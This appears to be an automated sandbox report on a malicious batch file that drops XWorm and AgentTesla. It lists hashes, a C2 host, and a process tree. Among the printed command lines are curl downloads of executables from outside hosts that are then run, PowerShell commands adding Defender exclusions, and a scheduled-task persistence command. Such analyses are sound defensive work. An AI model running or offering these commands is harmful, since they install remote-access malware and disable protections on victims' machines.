Analysis

max time kernel: 54s
max time network: 101s
platform: windows10-2004_x64
resource: win10v2004-20231127-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231127-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-12-2023 19:44
Static task: static1

Behavioral task: behavioral1
  Sample: #πΎπ βπππΌβπ ππ.π.bat
  Resource: win7-20231023-en

Behavioral task: behavioral2
  Sample: #πΎπ βπππΌβπ ππ.π.bat
  Resource: win10v2004-20231127-en
General

Target: #πΎπ βπππΌβπ ππ.π.bat
Size: 20KB
MD5: a7793c10f4e024c789964be67375ab2a
SHA1: 988d0af9a4ca435dd084ce541a250f6ba57f590a
SHA256: 770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
SHA512: 50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
SSDEEP: 384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO
Malware Config

Extracted: xworm
  goofyah-26004.portmap.host:26004
  Install_directory: %AppData%
  install_file: GVClientV4.exe
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Detect Xworm Payload (6 IoCs)
Processes (resource, yara_rule):
- C:\Windows\GV Client V4 BETA.exe: family_xworm
- C:\Windows\GV Client V4 BETA.exe: family_xworm
- C:\Windows\GV Client V4 BETA.exe: family_xworm
- behavioral2/memory/2216-27-0x0000000000830000-0x000000000084A000-memory.dmp: family_xworm
- C:\Users\Admin\AppData\Roaming\GVClientV4.exe: family_xworm
- C:\Users\Admin\AppData\Roaming\GVClientV4.exe: family_xworm

AgentTesla payload (1 IoC)
Processes (resource, yara_rule):
- behavioral2/memory/1408-14-0x0000021F5DCF0000-0x0000021F5DF06000-memory.dmp: family_agenttesla

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
- Key value queried: \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation (a.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation (GV Client V4 BETA.exe)

Drops startup file (2 IoCs)
Processes (description, ioc, process):
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk (GV Client V4 BETA.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk (GV Client V4 BETA.exe)

Executes dropped EXE (4 IoCs)
Processes (pid, process):
- 1408 GV-Loader.exe
- 4792 a.exe
- 2216 GV Client V4 BETA.exe
- 4136 GVClientV4.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes (description, ioc, process):
- Set value (str): \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GVClientV4 = "C:\\Users\\Admin\\AppData\\Roaming\\GVClientV4.exe" (GV Client V4 BETA.exe)

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
- 47: ip-api.com

Drops file in Windows directory (1 IoC)
Processes (description, ioc, process):
- File created: C:\Windows\GV Client V4 BETA.exe (a.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description, ioc, process):
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (GV-Loader.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (GV-Loader.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion (GV-Loader.exe)

Opens file in notepad (likely ransom note) (1 IoC)
Processes (pid, process):
- 2456 notepad.exe

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes (pid, process):
- 2216 GV Client V4 BETA.exe

Suspicious behavior: EnumeratesProcesses (15 IoCs)
Processes (pid, process):
- 2848 powershell.exe
- 2848 powershell.exe
- 4912 powershell.exe
- 4912 powershell.exe
- 4912 powershell.exe
- 4816 powershell.exe
- 4816 powershell.exe
- 4816 powershell.exe
- 5116 powershell.exe
- 5116 powershell.exe
- 5116 powershell.exe
- 4484 powershell.exe
- 4484 powershell.exe
- 4484 powershell.exe
- 2216 GV Client V4 BETA.exe

Suspicious use of AdjustPrivilegeToken (10 IoCs)
Processes (description, pid, process):
- Token: SeDebugPrivilege, 1408 GV-Loader.exe
- Token: SeDebugPrivilege, 2216 GV Client V4 BETA.exe
- Token: SeDebugPrivilege, 2848 powershell.exe
- Token: SeDebugPrivilege, 4912 powershell.exe
- Token: SeDebugPrivilege, 4816 powershell.exe
- Token: SeDebugPrivilege, 5116 powershell.exe
- Token: SeDebugPrivilege, 4484 powershell.exe
- Token: SeDebugPrivilege, 2216 GV Client V4 BETA.exe
- Token: SeShutdownPrivilege, 2216 GV Client V4 BETA.exe
- Token: SeDebugPrivilege, 4136 GVClientV4.exe

Suspicious use of SetWindowsHookEx (1 IoC)
Processes (pid, process):
- 2216 GV Client V4 BETA.exe

Suspicious use of WriteProcessMemory (32 IoCs)
Processes (description, pid, process, target process):
- PID 2036 wrote to memory of 232: 2036 cmd.exe -> cacls.exe
- PID 2036 wrote to memory of 232: 2036 cmd.exe -> cacls.exe
- PID 2036 wrote to memory of 1596: 2036 cmd.exe -> curl.exe
- PID 2036 wrote to memory of 1596: 2036 cmd.exe -> curl.exe
- PID 2036 wrote to memory of 2728: 2036 cmd.exe -> curl.exe
- PID 2036 wrote to memory of 2728: 2036 cmd.exe -> curl.exe
- PID 2036 wrote to memory of 3332: 2036 cmd.exe -> curl.exe
- PID 2036 wrote to memory of 3332: 2036 cmd.exe -> curl.exe
- PID 2036 wrote to memory of 2456: 2036 cmd.exe -> notepad.exe
- PID 2036 wrote to memory of 2456: 2036 cmd.exe -> notepad.exe
- PID 2036 wrote to memory of 1408: 2036 cmd.exe -> GV-Loader.exe
- PID 2036 wrote to memory of 1408: 2036 cmd.exe -> GV-Loader.exe
- PID 2036 wrote to memory of 4792: 2036 cmd.exe -> a.exe
- PID 2036 wrote to memory of 4792: 2036 cmd.exe -> a.exe
- PID 2036 wrote to memory of 4792: 2036 cmd.exe -> a.exe
- PID 2036 wrote to memory of 3228: 2036 cmd.exe -> PING.EXE
- PID 2036 wrote to memory of 3228: 2036 cmd.exe -> PING.EXE
- PID 4792 wrote to memory of 2848: 4792 a.exe -> powershell.exe
- PID 4792 wrote to memory of 2848: 4792 a.exe -> powershell.exe
- PID 4792 wrote to memory of 2848: 4792 a.exe -> powershell.exe
- PID 4792 wrote to memory of 2216: 4792 a.exe -> GV Client V4 BETA.exe
- PID 4792 wrote to memory of 2216: 4792 a.exe -> GV Client V4 BETA.exe
- PID 2216 wrote to memory of 4912: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 4912: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 4816: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 4816: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 5116: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 5116: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 4484: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 4484: 2216 GV Client V4 BETA.exe -> powershell.exe
- PID 2216 wrote to memory of 1416: 2216 GV Client V4 BETA.exe -> schtasks.exe
- PID 2216 wrote to memory of 1416: 2216 GV Client V4 BETA.exe -> schtasks.exe

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\#πΎπ βπππΌβπ ππ.π.bat"
  PID: 2036
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cacls.exe
    Command line: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    PID: 232
  - C:\Windows\system32\curl.exe
    Command line: curl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe
    PID: 1596
  - C:\Windows\system32\curl.exe
    Command line: curl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt
    PID: 2728
  - C:\Windows\system32\curl.exe
    Command line: curl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe
    PID: 3332
  - C:\Windows\system32\notepad.exe
    Command line: notepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt
    PID: 2456
    Signatures: Opens file in notepad (likely ransom note)
  - C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
    PID: 1408
    Signatures: Executes dropped EXE; Enumerates system info in registry; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\a.exe
    Command line: C:\Users\Admin\AppData\Roaming\a.exe
    PID: 4792
    Signatures: Checks computer location settings; Executes dropped EXE; Drops file in Windows directory; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAYgBjACMAPgA="
      Decoded command (base64, UTF-16LE): <#nal#>Add-MpPreference <#wpd#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#wjv#> -Force <#sbc#>
      PID: 2848
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\GV Client V4 BETA.exe
      Command line: "C:\Windows\GV Client V4 BETA.exe"
      PID: 2216
      Signatures: Checks computer location settings; Drops startup file; Executes dropped EXE; Adds Run key to start application; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\GV Client V4 BETA.exe'
        PID: 4912
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GV Client V4 BETA.exe'
        PID: 4816
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GVClientV4.exe'
        PID: 5116
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GVClientV4.exe'
        PID: 4484
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\schtasks.exe
        Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GVClientV4" /tr "C:\Users\Admin\AppData\Roaming\GVClientV4.exe"
        PID: 1416
        Signatures: Creates scheduled task(s)
  - C:\Windows\system32\PING.EXE
    Command line: ping -n 5 127.0.0.1
    PID: 3228
    Signatures: Runs ping.exe

- C:\Users\Admin\AppData\Roaming\GVClientV4.exe
  Command line: C:\Users\Admin\AppData\Roaming\GVClientV4.exe
  PID: 4136
  Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads